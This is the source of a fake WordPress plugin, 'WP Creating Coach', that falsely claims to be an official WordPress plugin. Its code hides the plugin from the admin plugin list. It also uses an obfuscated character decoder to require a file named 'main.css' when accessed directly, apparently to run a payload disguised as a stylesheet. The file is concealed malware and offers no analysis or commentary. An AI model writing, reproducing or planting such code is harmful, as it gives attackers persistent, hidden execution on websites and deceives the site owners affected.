File: /var/www/html/wp-content/plugins/wp-creating-coach/index.php
<?php
/*
Plugin Name: WP Creating Coach
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 12.8.7
Author URI: http://wordpress.org/#
License: GPL2
*/
function lhk_kwv()
{
    global $wp_list_table;
    
    if (!isset($wp_list_table)) {
        return;
    }
    $f = array('wp-creating-coach/index.php');
    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $f)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}
function tps_spq($plugins)
{
    $b = 'wp-creating-coach/index.php';
    if (array_key_exists($b, $plugins)) {
        unset($plugins[$b]);
    }
    return $plugins;
}
function xnq($a, $n)
{
    $x = '';
    for ($s = 0; $s < strlen($a); $s += 2) {
        $l = ord($a[$s]) - 65;
        $o = ord($a[$s + 1]);
        if ($o > 90) $o -= 6;
        $c = $l * 52 + ($o - 65);
        $x .= chr($c - $n);
    }
    return $x;
}
if (defined('ABSPATH')) {
    add_action('pre_current_active_plugins', 'lhk_kwv');
    add_filter('all_plugins', 'tps_spq');
} else {
    require_once xnq('QoQcQkQpPdQeQuQu', 763);
}